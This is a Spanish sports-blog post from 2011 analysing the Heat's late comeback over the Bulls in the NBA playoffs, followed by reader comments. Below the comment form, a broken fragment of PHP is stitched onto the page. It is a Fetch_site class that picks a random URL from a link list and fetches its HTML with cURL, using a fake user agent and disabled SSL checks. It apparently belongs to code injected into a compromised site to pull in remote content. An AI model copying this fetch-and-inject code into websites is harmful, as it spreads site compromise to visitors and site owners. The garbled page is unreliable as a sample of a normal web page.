La Crónica (26/05/2011): ¿Mal de altura?

27 de May de 2011 por txusma

Esto ya lo hemos visto antes. El equipo experimentado, el que cuenta con jugadores curtidos en mil batallas, remontó 12 puntos de diferencia en los últimos 3 minutos de partido. No hemos vuelto a repasar los 2 últimos partidos de la serie Mavs-Thunder sinó que hablamos del partido de ayer, del Heat-Bulls (83-80).

Hasta el minuto 45 de partido, los Bulls parecían dominar con facilidad el marcador a pesar de no estar jugando tampoco un gran encuentro. En ese momento estallaron Dwyane Wade (bastante apagado hasta el momento) y Lebron James, que fueron capaces de anotar 8 puntos cada uno antes del final. Los Bulls, en esos fatídicos minutos solo anotaron 3. Un par de canastas de Wade , un triple de Lebron, un 3+1 de Wade (con falta de Derrick Rose), cinco puntos más de Lebron… Los Heat (o más bien Wade y Lebron) no fallaron ni uno de los 6 tiros que intentaron y Bosh colocó la cerecita en lo alto del pastel con un par de tiros libres a falta de 16 segundos. El intento desesperado de Rose lo taponó, como no, Lebron James.

Derrick Rose se estrelló de nuevo frente la defensa de los Heat anotando solo 9 de sus 29 lanzamientos y los Bulls lo pagaron como han pagado la irregularidad del MVP durante toda la serie. Lebron James y Dwyane Wade han demostrado estar un punto por encima y lo han hecho siendo generosos el uno con el otro y sin demostrar envidias. Tienen claro para que se juntaron. Nada entorpecerá el camino hacia su objetivo. Ahora, a conquistar Tejas.

PREMIOS

MVP: No creo que haya discusión. Lebron James es el MVP del partido, de la serie y seguramente de los Heat durante todo el año le pese a quien le pese. Anoche fueron 28 puntos, 11 rebotes, 6 asistencias y una actuación magistral en los últimos minutos.

Sorpresa: En el último cuarto, en el más importante del partido, Boozer y Noah no disputaron ni un minuto. En su lugar jugaron Taj Gibson y Kurt Thomas, que, a pesar de su edad, no cuajó un mal partido con 4 puntos y 8 rebotes.

Decepción: Triste actuación de Carlos Boozer y Joakim Noah. Si en la previa pensábamos que podrían ser la punta de lanza de los Bulls viendo la teórica fragilidad del juego interior de Miami, la realidad ha demostrado que estábamos equivocados. Ayer, Boozer se quedó en 5 y 6 rebotes y Noah en 5 puntos y 8 rebotes.

Esfuerzo en vano: Derrick Rose anotó 25 puntos y repartió 8 asistencias pero su serie de tiro fue nefasta al fallar 20 de sus 29 intentos. En todo caso, el resto no estuvo mucho mejor.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Una pregunta al oráculo, sería posible un trade de Howard a Chicago? Largando al paquete de Boozer y otro par de tipos sería viable no? Y creo que él y Rose se compenetrarìan brutalmente

      Citar

  2. jas dice:
    #2

    puuf seria brutal, me cae la baba solo d pensarlo

      Citar

  3. GreenPride dice:
    #3

    Pues de nuevo vemos como el equipo veterano se merienda al joven al final del partido. En este caso no sólo por veteranía sino también por mejores jugadores para decidir. Lo mencioné en el análisis de la serie, creía que los Heat ganarían porque llegados los momentos clave tenían mejores jugadores para decidir y así ha sido una y otra vez en esta serie. Wade se redimió de nuevo al final de un nuevo horroroso partido en el que perdió 10 balones y LeBron llevaba 9 fallos consecutivos en el lanzamiento al llegar a la parte final del partido pero como ha quedado dicho entre los 2 metieron 16 puntos consecutivos y le dieron la vuelta a un partido que los Bulls tenían ganado.
    Temporadón de Chicago que se ve un poco empañado por su incapacidad en estas series pero eso es ser injusto con ellos. Sin embargo para aspirar al anillo les falta al menos un anotador exterior que abra las zonas para Rose. Si este mejorase su lanzamiento de lejos (esta temporada mucho mejor pero todavía insuficiente) también les vendría muy bien. Por supuesto mención especial para Boozer y Noah ¿Por qué no los sacaron ni un segundo en el último cuarto? ¿Boozer sobrevalorado? Para mí es un muy buen jugador que sin embargo no es nada decisivo en los finales de partido pues no puede crear sus propios tiros.
    Por los Heat partido malo tirando a horrible en ataque hasta esa remontada de los 2 grandes al final. Lo único positivo que su defensa nunca aflojó y les permitió mantenerse más o menos cerca. Y ahora las Finales contra Dallas. ¿Quien parará al enrachado Robin Hood? Apuesto por Anthony y Haslem los 3 primeros cuartos y posiblemente LeBron en el último cuarto. Por los Heat, es super importante recuperar a Wade que ha tenido una serie bastante mala y parece tocado en un hombro. Contra Dallas será fundamental su aportación. Y una vez más decir que aunque yo no soy muy fan de LeBron, es de justicia reconocer los grandísimos playoffs que está haciendo. Claramente el mejor jugador de los Heat, grande en defensa y enchufando casi todas las canastas clutch de su equipo. Si sigue así se quitará muchos de los prejuicios que hasta ahora le tiraban sus detractores.
    Un último deseo, esperemos que las finales sean más competidas y no haya un claro dominador como en estas 2 finales de conferencia. Mi pronóstico Heat 4-2 y lo lamentaré por el gran Nowitzki y por Kidd

      Citar

  4. HisRoyalAirness dice:
    #4

    Para mí Boozer es un bluff escandaloso, los Bulls en RS han ganado con y sin él. Nunca marca la diferencia ante sus pares ( a no ser que sean del montón) salvo que le dejen tirar desde media distancia. En PO, donde hay rivales de nivel, nunca lidera a su equipo salvo que vaya a remolque de alguien y siempre que el entorno sea favorable. Tiene un reconocimiento que no merece.
    Así como Noah tampoco me parece gran cosa individualmente creo que aporta mucho al equipo y le pone ganas y esfuerzo y, si no me equivoco, no cobra tanto como Boozer.
    Boozer llegó a Bulls como escudero de lujo y no lo es

      Citar

  5. Javijaen dice:
    #5

    Muy de acuerdo con el análisis de GreenPride, con matices:
    – Lo de Noah y Boozer en el último cuarto fue muy sangrante, aunque tuvieran cinco faltas. Creo que estuvieron de notable para arriba los dos todo el partido, especialmente en el tercer cuarto.
    – Rose estuvo sobresaliente hasta los tres últimos minutos, donde lo falla casi todo (menos un tiro libre creo).
    – No creo que Gibson sea mejor que Boozer, aunque haga buenas actuaciones.
    – Con Bogans y Korver horribles, estaba claro que Rose se la jugaría, pero al ser ante Lebron, ¿no hubiera sido original que Deng se la jugara ante Wade?
    – Partido nefasto de Wade y pobre de Bosh y de Lebron hasta el arreón final. Ahora, los tres últimos minutos es para que Spoelstra se tome una birra en casa viendo la repetición.
    Finalmente una reflexión: Si ante un equipo que se ha comido en rebotes ofensivos a Miami (quizá no tanto en este partido), con un grandísimo base y dos mulos bajo tablero no ha podido contra Bibby-Chalmers y compañía, ¿tendrá alguna oportunidad Robin Hood ante The Chosen One y Flash???

      Citar

  6. Vader dice:
    #6

    Creo que si tendra alguna posibilidad el bueno de Dirk. Dallas es un equipo mucho mas dificil de defender que Chicago. Dirk, Terry, Marion, Chandler, Kidd, Barea… Hay varios que pueden anotar, es un ataque mas imprevisible. Sera una gran final.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>